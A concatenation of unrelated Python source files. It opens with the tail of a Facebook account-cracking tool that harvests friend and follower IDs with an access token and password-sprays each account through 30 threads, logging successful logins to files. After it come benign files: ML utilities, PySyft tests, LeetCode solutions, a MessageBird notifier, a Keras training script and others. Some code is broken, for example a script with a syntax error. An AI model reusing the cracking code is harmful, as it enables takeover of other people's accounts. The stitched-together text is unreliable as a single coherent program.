print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def auto_crack():
global token
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t Login FB id to continue\x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def a_s():
id = []
cps = []
oks = []
a_s = raw_input(' \033[1;97m╰─MPG➤ ')
if a_s == '1':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~Choice public cracking~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input(' \033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '2':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice followers cracking ~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input('\033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999')
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '3':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
try:
idlist= raw_input('[+] File Name: ')
for line in open(idlist ,'r').readlines():
id.append(line.strip())
except IOError:
print"[!] File Not Found."
raw_input('Press Enter To Back. ')
crack()
elif a_s == '0':
menu()
else:
print ''
print '\tChoose valid option' + w
a_s()
print ' Total ids: ' + str(len(id))
time.sleep(0.5)
print ' \033[1;92mCrack Running\033[1;94m '
time.sleep(0.5)
print 47 * '-'
print '\t\033[1;95mITz MPG BRAND \033[1;94m'
print 47 * '-'
def main(arg):
user = arg
(uid, name) = user.split('|')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass1
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass1
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass2
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass2
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass3, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass3
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass3
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass4, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass4
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass4
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass4 + '\n')
cp.close()
cps.apppend(uid + pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 47 * '-'
print ' \033[1;92mMPG BranD PROGRAMMING'
print ' \033[1;92mTotal \033[1;95mOk\033[1;90m/\033[1;97mCp:' + str(len(oks)) + '/' + str(len(cps))
print 47 * '-'
raw_input(' \033[1;90mPress enter to back')
auto_crack()
if __name__ == '__main__':
reg()
| StarcoderdataPython |
11265737 | import json
import pandas as pd
from pathlib import Path
from itertools import repeat
from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
import itertools
import sklearn
import io
from sklearn.metrics import confusion_matrix
from torchvision import transforms
from PIL import Image
from model.metric import Metric
import argparse
def plot_confusion_matrix(cm, class_names):
"""
Returns a matplotlib figure containing the plotted confusion matrix.
Args:
cm (array, shape = [n, n]): a confusion matrix of integer classes
class_names (array, shape = [n]): String names of the integer classes
"""
figure = plt.figure(figsize=(8, 8))
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)
plt.title("Confusion matrix")
plt.colorbar()
tick_marks = np.arange(len(class_names))
plt.xticks(tick_marks, class_names, rotation=45)
plt.yticks(tick_marks, class_names)
# Normalize the confusion matrix.
cm = np.around(cm.astype('float') / cm.sum(axis=1)[:, np.newaxis], decimals=2)
# Use white text if squares are dark; otherwise black.
threshold = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
color = "white" if cm[i, j] > threshold else "black"
plt.text(j, i, cm[i, j], horizontalalignment="center", color=color)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
return figure
def plot_to_image(figure):
"""Converts the matplotlib plot specified by 'figure' to a PNG image and
returns it. The supplied figure is closed and inaccessible after this call."""
# Save the plot to a PNG in memory.
buf = io.BytesIO()
plt.savefig(buf, format='png')
# Closing the figure prevents it from being displayed directly inside
# the notebook.
plt.close(figure)
buf.seek(0)
# Convert PNG buffer to TF image
transforms.ToTensor()(Image.open(buf.getvalue()))
return buf
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def confusion_matrix_image(output, target):
# Use the model to predict the values from the validation dataset.
# Calculate the confusion matrix.
target = target.detach().numpy()
output = output.detach().numpy()
output = np.argmax(output, axis=1)
cm = confusion_matrix(target, output)
# Log the confusion matrix as an image summary.
figure = plot_confusion_matrix(cm, class_names=classes)
return figure
def ensure_dir(dirname):
dirname = Path(dirname)
if not dirname.is_dir():
dirname.mkdir(parents=True, exist_ok=False)
def read_json(fname):
fname = Path(fname)
with fname.open('rt') as handle:
return json.load(handle, object_hook=OrderedDict)
def write_json(content, fname):
fname = Path(fname)
with fname.open('wt') as handle:
json.dump(content, handle, indent=4, sort_keys=False)
def inf_loop(data_loader):
''' wrapper function for endless data loader. '''
for loader in repeat(data_loader):
yield from loader
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
class MetricTracker:
def __init__(self, *keys, writer=None):
self.writer = writer
self._data = pd.DataFrame(index=keys, columns=['total', 'counts', 'average'])
self.reset()
def reset(self):
for col in self._data.columns:
self._data[col].values[:] = 0
def update(self, key, value, n=1):
# print("Key", key)
# print("Value", value)
# print(self._data)
if self.writer is not None:
self.writer.add_scalar(key, value)
self._data.total[key] += value * n
self._data.counts[key] += n
self._data.average[key] = self._data.total[key] / self._data.counts[key]
def avg(self, key):
return self._data.average[key]
def result(self):
return dict(self._data.average)
| StarcoderdataPython |
1731757 | from __future__ import annotations
# pylint: disable=no-member
import datetime
from typing import List, Any
from instascrape.core._static_scraper import _StaticHtmlScraper
from instascrape.core._mappings import _PostMapping
class Post(_StaticHtmlScraper):
_Mapping = _PostMapping
def load(self, keys: List[str] = [], exclude: List[str] = []):
super().load(keys=keys)
self.upload_date = datetime.datetime.fromtimestamp(self.upload_date)
@classmethod
def from_shortcode(cls, shortcode: str) -> Post:
url = f"https://www.instagram.com/p/{shortcode}/"
return cls(url, name=shortcode)
| StarcoderdataPython |
4896066 | <reponame>Rishav1/PySyft
import glob
import os
import sys
import time
import urllib.request
from pathlib import Path
from zipfile import ZipFile
import pytest
import nbformat
import numpy as np
import pandas as pd
import papermill as pm
import torch
import syft as sy
from syft import TorchHook
from syft.workers.websocket_server import WebsocketServerWorker
# lets start by finding all notebooks currently available in examples and subfolders
all_notebooks = [Path(n) for n in glob.glob("examples/tutorials/**/*.ipynb", recursive=True)]
# buggy notebooks with explanation what does not work
exclusion_list_notebooks = [
# Part 10 needs either torch.log2 to be implemented or numpy to be hooked
"Part 10 - Federated Learning with Secure Aggregation.ipynb",
# Part 13b and c need fixing of the tensorflow serving with PySyft
"Part 13b - Secure Classification with Syft Keras and TFE - Secure Model Serving.ipynb",
"Part 13c - Secure Classification with Syft Keras and TFE - Private Prediction Client.ipynb",
# This notebook is excluded as it needs library code modification which I might add later on
"Build your own tensor type (advanced).ipynb",
"Federated Recurrent Neural Network.ipynb",
]
exclusion_list_folders = [
"examples/tutorials/websocket",
"examples/tutorials/advanced/Monitor_Network_Traffic",
"examples/tutorials/advanced/websockets-example-MNIST-parallel",
# To run these notebooks, we need to run grid nodes / grid gateway previously (they aren't in this repository)
"examples/tutorials/grid",
"examples/tutorials/grid/federated_learning/spam_prediction",
"examples/tutorials/grid/federated_learning/mnist",
# This notebook is skipped because it fails in travis and we do not know why for the moment
"examples/tutorials/advanced/Federated SMS Spam prediction",
]
# remove known buggy notebooks and folders that should be excluded
not_excluded_notebooks = []
for n in all_notebooks:
if n.name in exclusion_list_notebooks:
continue
elif str(n.parent) in exclusion_list_folders:
continue
else:
not_excluded_notebooks.append(n)
def test_notebooks_basic(isolated_filesystem):
"""Test Notebooks in the tutorial root folder."""
notebooks = glob.glob("*.ipynb")
for notebook in notebooks:
list_name = Path("examples/tutorials/") / notebook
if list_name in not_excluded_notebooks:
not_excluded_notebooks.remove(list_name)
res = pm.execute_notebook(
notebook,
"/dev/null",
parameters={
"epochs": 1,
"n_test_batches": 5,
"n_train_items": 64,
"n_test_items": 64,
},
timeout=300,
)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
def test_notebooks_basic_translations(isolated_filesystem):
"""Test Notebooks in the tutorial root folder."""
notebooks = glob.glob("translations/**/*.ipynb", recursive=True)
for notebook in notebooks:
list_name = Path("examples/tutorials/") / notebook
if list_name in not_excluded_notebooks:
not_excluded_notebooks.remove(list_name)
res = pm.execute_notebook(
notebook,
"/dev/null",
parameters={
"epochs": 1,
"n_test_batches": 5,
"n_train_items": 64,
"n_test_items": 64,
},
timeout=300,
)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
def test_notebooks_advanced(isolated_filesystem):
notebooks = glob.glob("advanced/*.ipynb")
notebooks += glob.glob("advanced/Split Neural Network/*.ipynb")
for notebook in notebooks:
list_name = Path("examples/tutorials/") / notebook
if list_name in not_excluded_notebooks:
not_excluded_notebooks.remove(list_name)
res = pm.execute_notebook(notebook, "/dev/null", parameters={"epochs": 1}, timeout=300)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
def test_fl_with_trainconfig(isolated_filesystem, start_remote_server_worker_only, hook):
os.chdir("advanced/Federated Learning with TrainConfig/")
notebook = "Introduction to TrainConfig.ipynb"
p_name = Path("examples/tutorials/advanced/Federated Learning with TrainConfig/")
not_excluded_notebooks.remove(p_name / notebook)
hook.local_worker.remove_worker_from_registry("alice")
kwargs = {"id": "alice", "host": "localhost", "port": 8777, "hook": hook}
data = torch.tensor([[0.0, 1.0], [1.0, 0.0], [1.0, 1.0], [0.0, 0.0]], requires_grad=True)
target = torch.tensor([[1.0], [1.0], [0.0], [0.0]], requires_grad=False)
dataset = sy.BaseDataset(data, target)
process_remote_worker = start_remote_server_worker_only(dataset=(dataset, "xor"), **kwargs)
res = pm.execute_notebook(notebook, "/dev/null", timeout=300)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
process_remote_worker.terminate()
sy.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
@pytest.mark.skip
def test_fl_sms(isolated_filesystem): # pragma: no cover
sys.path.append("advanced/Federated SMS Spam prediction/")
import preprocess
os.chdir("advanced/Federated SMS Spam prediction/")
notebook = "Federated SMS Spam prediction.ipynb"
p_name = Path("examples/tutorials/advanced/Federated SMS Spam prediction/")
not_excluded_notebooks.remove(p_name / notebook)
Path("data").mkdir(parents=True, exist_ok=True)
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip"
urllib.request.urlretrieve(url, "data.zip")
with ZipFile("data.zip", "r") as zipObj:
# Extract all the contents of the zip file in current directory
zipObj.extractall()
preprocess.main()
res = pm.execute_notebook(notebook, "/dev/null", parameters={"epochs": 1}, timeout=300)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
def test_fl_with_websockets_and_averaging(
isolated_filesystem, start_remote_server_worker_only, hook
):
os.chdir("advanced/websockets-example-MNIST/")
notebook = "Federated learning with websockets and federated averaging.ipynb"
p_name = Path("examples/tutorials/advanced/websockets-example-MNIST/")
not_excluded_notebooks.remove(p_name / notebook)
for n in ["alice", "bob", "charlie"]:
hook.local_worker.remove_worker_from_registry(n)
kwargs_list = [
{"id": "alice", "host": "localhost", "port": 8777, "hook": hook},
{"id": "bob", "host": "localhost", "port": 8778, "hook": hook},
{"id": "charlie", "host": "localhost", "port": 8779, "hook": hook},
]
processes = [start_remote_server_worker_only(**kwargs) for kwargs in kwargs_list]
res = pm.execute_notebook(
notebook,
"/dev/null",
parameters={"args": ["--epochs", "1", "--test_batch_size", "100"], "abort_after_one": True},
timeout=300,
)
assert isinstance(res, nbformat.notebooknode.NotebookNode)
[server.terminate() for server in processes]
for n in ["alice", "bob", "charlie"]:
sy.VirtualWorker(id=n, hook=hook, is_client_worker=False)
def test_not_tested_notebooks():
"""This test must always be last"""
assert len(not_excluded_notebooks) == 0, not_excluded_notebooks
| StarcoderdataPython |
6429560 | <gh_stars>100-1000
# Copyright (c) 2020, <NAME>
# License: MIT License
import os
import time
from ezdxf.lldxf.tagger import ascii_tags_loader, tag_compiler
from ezdxf.recover import safe_tag_loader
from ezdxf import EZDXF_TEST_FILES
BIG_FILE = os.path.join(EZDXF_TEST_FILES, "CADKitSamples", "torso_uniform.dxf")
def load_ascii():
with open(BIG_FILE, "rt") as fp:
list(tag_compiler(iter(ascii_tags_loader(fp))))
def safe_load_bytes():
with open(BIG_FILE, "rb") as fp:
list(safe_tag_loader(fp))
def print_result(time, text):
print(f"Operation: {text} takes {time:.2f} s\n")
def run(func):
start = time.perf_counter()
func()
end = time.perf_counter()
return end - start
if __name__ == "__main__":
print_result(run(safe_load_bytes), "safe_tag_loader()")
print_result(run(load_ascii), "ascii_tag_compiler()")
| StarcoderdataPython |
6654334 | # test_src.py
# -----------
# Basically a sample script that can be run to unlock any
# Achievements specified below
import dev_achievements
# HelloWorldAchievement
print('Helo world', end='')
print('\nHello World!')
# AssignAchievement
x = 4
# MathOperatorsAchievement
x += 1
# BitwiseOperatorsAchievement
x << 2
x ^ 2
# ConditionalAchievement
if x < 4:
x = 4
else:
x = 5
# LoopsAchievement
for i in range(2):
x + i
x = 0
while x < 5:
x += 1
# ComprehensionAchievement
x = [i for i in range(10)]
# PassAchievement
for _ in range(2):
pass
# FunctionAchievement
def some_func():
pass
def some_other_func():
pass
some_func()
# LambdaAchievement
lf = lambda x: x + 1
# ListAchievement
x = [4, 5, 6]
# DictAchievement
x = {'name': '<NAME>'}
# ClassAchievement
class Test:
pass
class OtherTest:
pass
t = Test()
| StarcoderdataPython |
9734761 | __source__ = 'https://leetcode.com/problems/number-of-segments-in-a-string/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/number-of-segments-in-a-string.py
# Time: O(n)
# Space: O(1)
# Count the number of segments in a string,
# where a segment is defined to be a contiguous
# sequence of non-space characters.
#
# Description: Leetcode # 434. Number of Segments in a String
#
# Please note that the string does not
# contain any non-printable characters.
#
# Example:
#
# Input: "Hello, my name is John"
# Output: 5
# String
#
import unittest
class Solution(object):
def countSegments(self, s):
return len(s.split())
def countSegments1(self, s):
"""
:type s: str
:rtype: int
"""
result = int(len(s) and s[-1] != ' ')
for i in xrange(1, len(s)):
if s[i] == ' ' and s[i-1] != ' ':
result += 1
return result
# 20ms 97.59%
def countSegments2(self, s):
"""
:type s: str
:rtype: int
"""
return len([i for i in s.strip().split(' ') if i])
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/number-of-segments-in-a-string/solution/
# 5ms 10.30%
class Solution {
public int countSegments(String s) {
return ("x " + s).split(" +").length - 1;
}
}
# 1ms 100%
class Solution {
public int countSegments(String s) {
int res = 0;
for (int i = 0; i < s.length(); i++) {
if (s.charAt(i) != ' ' && ( i == 0 || s.charAt(i-1) == ' ')) {
res++;
}
}
return res;
}
}
'''
| StarcoderdataPython |
204775 | from flask_wtf import FlaskForm
from wtforms.fields import SelectMultipleField
from wtforms.validators import DataRequired
class SelectForm(FlaskForm):
response = SelectMultipleField('Response', choices = [], \
validators=[DataRequired()]) | StarcoderdataPython |
11849 | #!/usr/bin/env python3
# NOTE: this file does not have the executable bit set. This tests that
# Meson can automatically parse shebang lines.
import sys
template = '#define RET_VAL %s\n'
output = template % (open(sys.argv[1]).readline().strip())
open(sys.argv[2], 'w').write(output)
| StarcoderdataPython |
9654499 | <filename>homeassistant/components/message_bird/notify.py
"""MessageBird platform for notify component."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_API_KEY, CONF_SENDER
import homeassistant.helpers.config_validation as cv
from homeassistant.components.notify import (
ATTR_TARGET,
PLATFORM_SCHEMA,
BaseNotificationService,
)
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_SENDER, default="HA"): vol.All(
cv.string, vol.Match(r"^(\+?[1-9]\d{1,14}|\w{1,11})$")
),
}
)
def get_service(hass, config, discovery_info=None):
"""Get the MessageBird notification service."""
import messagebird
client = messagebird.Client(config[CONF_API_KEY])
try:
# validates the api key
client.balance()
except messagebird.client.ErrorException:
_LOGGER.error("The specified MessageBird API key is invalid")
return None
return MessageBirdNotificationService(config.get(CONF_SENDER), client)
class MessageBirdNotificationService(BaseNotificationService):
"""Implement the notification service for MessageBird."""
def __init__(self, sender, client):
"""Initialize the service."""
self.sender = sender
self.client = client
def send_message(self, message=None, **kwargs):
"""Send a message to a specified target."""
from messagebird.client import ErrorException
targets = kwargs.get(ATTR_TARGET)
if not targets:
_LOGGER.error("No target specified")
return
for target in targets:
try:
self.client.message_create(
self.sender, target, message, {"reference": "HA"}
)
except ErrorException as exception:
_LOGGER.error("Failed to notify %s: %s", target, exception)
continue
| StarcoderdataPython |
1894466 | import unittest
import torch.cuda as cuda
from inferno.utils.model_utils import ModelTester
class UNetTest(unittest.TestCase):
def test_unet_2d(self):
from inferno.extensions.models import UNet
tester = ModelTester((1, 1, 256, 256), (1, 1, 256, 256))
if cuda.is_available():
tester.cuda()
tester(UNet(1, 1, dim=2, initial_features=32))
def test_unet_3d(self):
from inferno.extensions.models import UNet
tester = ModelTester((1, 1, 16, 64, 64), (1, 1, 16, 64, 64))
if cuda.is_available():
tester.cuda()
# test default unet 3d
tester(UNet(1, 1, dim=3, initial_features=8))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
6554690 | from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(name='PyTorch-ProbGraph',
version='0.0.1',
description='Hierarchical Probabilistic Graphical Models in PyTorch',
long_description=long_description,
author='<NAME>, <NAME>',
author_email='<EMAIL>, <EMAIL>',
url='https://github.com/kpoeppel/pytorch_probgraph/',
packages=['pytorch_probgraph'],
install_requires=['torch', 'numpy', 'matplotlib', 'tqdm',
'sphinx_rtd_theme', 'sphinx', 'setuptools'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
| StarcoderdataPython |
1988392 | <reponame>suzaku/plain_obj
from keyword import iskeyword
from collections import OrderedDict
def new_type(type_name, field_names):
if isinstance(field_names, str):
# names separated by whitespace and/or commas
field_names = field_names.replace(',', ' ').split()
check_name(type_name)
seen_fields = set()
for name in field_names:
check_name(name)
if name in seen_fields:
raise ValueError('Encountered duplicate field name: %r' % name)
seen_fields.add(name)
return type(
type_name,
(PlainBase,),
{
'__slots__': field_names,
'__init__': make_constructor(field_names)
}
)
class PlainBase(object):
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return all(i == j for i, j in zip(self, other))
def __iter__(self):
for name in self.__slots__:
yield getattr(self, name)
def __repr__(self):
values = tuple(self)
return self.__class__.__name__ + repr(values)
def to_dict(self):
return OrderedDict(zip(self.__slots__, self))
def make_constructor(fields):
assignments = '\n'.join([' self.{0} = {0}'.format(f) for f in fields])
parameter_lists = ', '.join(fields)
source = 'def __init__(self, %s):\n%s' % (parameter_lists, assignments)
namespace = {}
exec(source, namespace)
return namespace['__init__']
def check_name(name):
if not all(c.isalnum() or c == '_' for c in name):
raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
if iskeyword(name):
raise ValueError('Type names and field names cannot be a keyword: %r' % name)
if name[0].isdigit():
raise ValueError('Type names and field names cannot start with a number: %r' % name)
| StarcoderdataPython |
3282948 | <filename>processSingleJobs.py
#!/usr/bin/python
#------------------------------------------------------------------------------
# Name: processSingleJobs.py
# Author: <NAME>, 20150205
# Last Modified: 20150218
#This is a follow-up to the lookThresh.py script; it reads the top_jobs.txt list
# and analyses each candidate job for stats etc. A couple of functions are
# re-used from lookThresh.py, so it's imported here.
#------------------------------------------------------------------------------
import os
import string
from lookThresh import *
from singleJob import *
jobId = []
for lines in open("top_jobs.txt", 'r').readlines():
if not lines[0] == '%':
eachLine = string.split(lines)
jobId.append(eachLine[0])
# Checks that jobId is less than ten candidates, otherwise put rest at the
# back, after upper limits plot
if len(jobId) > 10:
jobIdTail = jobId[10:]
jobId = jobId[0:9]
def jobOut( jobId ):
"""docstring for jobOut"""
jobOut = ""
for singleJobId in jobId:
jobOut.append( "Job number: " + str(singleJobId) + "\n" )
jobOut.append( singleJobOutputStr( singleJobId ) )
jobOut.append( "" )
jobOut.append( single2FPlot( singleJobId )
return jobOut
jobHeadOut = jobOut( jobId )
jobTailOut = jobOut( jobIdTail )
#------------------------------------------------------------------------------
# End of processSingleJobs.py
#------------------------------------------------------------------------------
| StarcoderdataPython |
1681461 | # Enter your code here. Read input from STDIN. Print output to STDOUT
T=int(input())
for i in range(T):
element1=int(input())
A=set(map(int,input().split()))
element2=int(input())
B=set(map(int,input().split()))
if A.issubset(B):
print("True")
else:
print("False")
| StarcoderdataPython |
8190473 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 29 12:50:17 2018
@author: Simon
Trains the NN with the parameters:
dropout=0.3
Size of first hidden lauer: 350
One hidden layers
Sigmoid Activation
Using matrix from folder: 03-01-2019 11.04
Using GP matrix shape
No options should be used when calling the script.
"""
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
if os.getcwd()[-2:] == 'NN':
os.chdir('..')
from createLargerFeatureMatrix import simpleLargeMatrix, no_redundancy_matrix, advanced_large_matrix
import pickle
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras import regularizers
import numpy as np
drop=0.3
N=350
act="sigmoid"
n_hidden=1
saved_matrix_folder="03-01-2019 11.04"
feature_matrix_shape="group_period_x_group_period"
for i in range(5):
for act in ['sigmoid','relu']:
matrix_functions={"atomic_number":simpleLargeMatrix, "group_period_2x2":no_redundancy_matrix, "group_period_x_group_period":advanced_large_matrix}
matrix_function=matrix_functions[feature_matrix_shape]
path = "Saved matrices/"+saved_matrix_folder+"/sorted_Cutoff25_noSingleElementKrystals/"
histories_folder='best'
if histories_folder not in os.listdir("NN/Saved"):
os.mkdir("NN/Saved/"+histories_folder)
#Load training data
featureMatrixFile = "train_featureMatrix.npy"
atomicSymbolsListFile = "train_pickledAtomicSymbolsList.txt"
energiesFile = "train_pickledEnergies.txt"
largeFeatureMatrix = matrix_function(path,featureMatrixFile, atomicSymbolsListFile)
with open(path+energiesFile, "rb") as pickleFile:
energies = pickle.load(pickleFile)
print(largeFeatureMatrix.shape)
largeFeatureMatrix.shape = (largeFeatureMatrix.shape[0], -1)
X = largeFeatureMatrix
Y = np.array(energies)
#Load validation set
featureMatrixFileValidate = "validate_featureMatrix.npy"
atomicSymbolsListFileValidate = "validate_pickledAtomicSymbolsList.txt"
energiesFileValidate = "validate_pickledEnergies.txt"
largeFeatureMatrixValidate = matrix_function(path,featureMatrixFileValidate, atomicSymbolsListFileValidate)
with open(path+energiesFileValidate, "rb") as pickleFile:
energiesValidate = pickle.load(pickleFile)
largeFeatureMatrixValidate.shape = (largeFeatureMatrixValidate.shape[0], -1)
X_v = largeFeatureMatrixValidate
Y_v = np.array(energiesValidate)
#Load test set
featureMatrixFileTest = "test_featureMatrix.npy"
atomicSymbolsListFileTest = "test_pickledAtomicSymbolsList.txt"
energiesFileTest = "test_pickledEnergies.txt"
largeFeatureMatrixTest = matrix_function(path,featureMatrixFileTest, atomicSymbolsListFileTest)
with open(path+energiesFileTest, "rb") as pickleFile:
energiesTest = pickle.load(pickleFile)
largeFeatureMatrixTest.shape = (largeFeatureMatrixTest.shape[0], -1)
X_t = largeFeatureMatrixTest
Y_t = np.array(energiesTest)
#Model
model = Sequential()
inputShape = np.shape(X)[1:]
#First hidden layer after input
model.add(Dropout(drop, input_shape=inputShape))
model.add(Dense(N, activation=act))
#Addition hidden layers after input
for n in range(n_hidden-1):
model.add(Dropout(drop))
model.add(Dense(N//(2**(n+1)), activation=act))
#Output layer
model.add(Dropout(drop))
model.add(Dense(1))
#Compile model
model.compile(loss='mse', optimizer='adam', metrics=["mse"])
print(model.summary())
#Fit the model. This is where the hard computing happens.
#Number of epochs is number of iterations through dataset
#Batch size is number of iterations before weights are changed.
history=model.fit(X, Y, epochs=70, batch_size=50, validation_data=(X_v,Y_v))
best_saved=os.listdir("NN/Saved/"+histories_folder)
file_num=1
num_found=False
while num_found == False:
if f"history{file_num}{act}" in best_saved:
file_num+=1
else:
num_found = True
with open(f"NN/Saved/"+histories_folder+f"/history"+str(file_num)+act, 'wb') as file:
pickle.dump(history.history, file)
# with open(f"NN/Saved/"+histories_folder+f"/model"+str(file_num), 'wb') as file:
# pickle.dump(model, file)
model.save(f"NN/Saved/"+histories_folder+f"/model"+str(file_num)+act+'.h5')
#Evaluate model efficiency
#scores = model.evaluate(X, Y)
#print("\n%s: %.2f eV" % (model.metrics_names[1], scores[1]))
#Make predictions on training set
predictions = model.predict(X)
a=0
for i in range(len(predictions)):
a+=(energies[i]-predictions[i])**2
rmse=np.sqrt(a/len(energies))
print("RMSE on training data "+str(rmse))
#Make predictions on validation set
predictions_validate = model.predict(X_v)
a=0
for i in range(len(predictions_validate)):
a+=(energiesValidate[i]-predictions_validate[i])**2
rmseValidate=np.sqrt(a/len(energiesValidate))
print("RMSE on validation data "+str(rmseValidate))
#Make predictions on test set
predictions_test = model.predict(X_t)
a=0
for i in range(len(predictions_test)):
a+=(energiesTest[i]-predictions_test[i])**2
rmseTest=np.sqrt(a/len(energiesTest))
print("RMSE on test data "+str(rmseTest))
first_outs=["Activation = "+act,"Drop = " + str(drop),"N = " + str(N), "Number of hidden layers (width halves with every layer) = " + str(n_hidden), "Saved matrix folder = "+saved_matrix_folder,"Matrix shape = "+feature_matrix_shape]
outs = ["Activation: "+act, "Model number= = "+str(file_num),"RMSE on training data= "+str(rmse),"RMSE on validation data= "+str(rmseValidate),"RMSE on test data= "+str(rmseTest)]
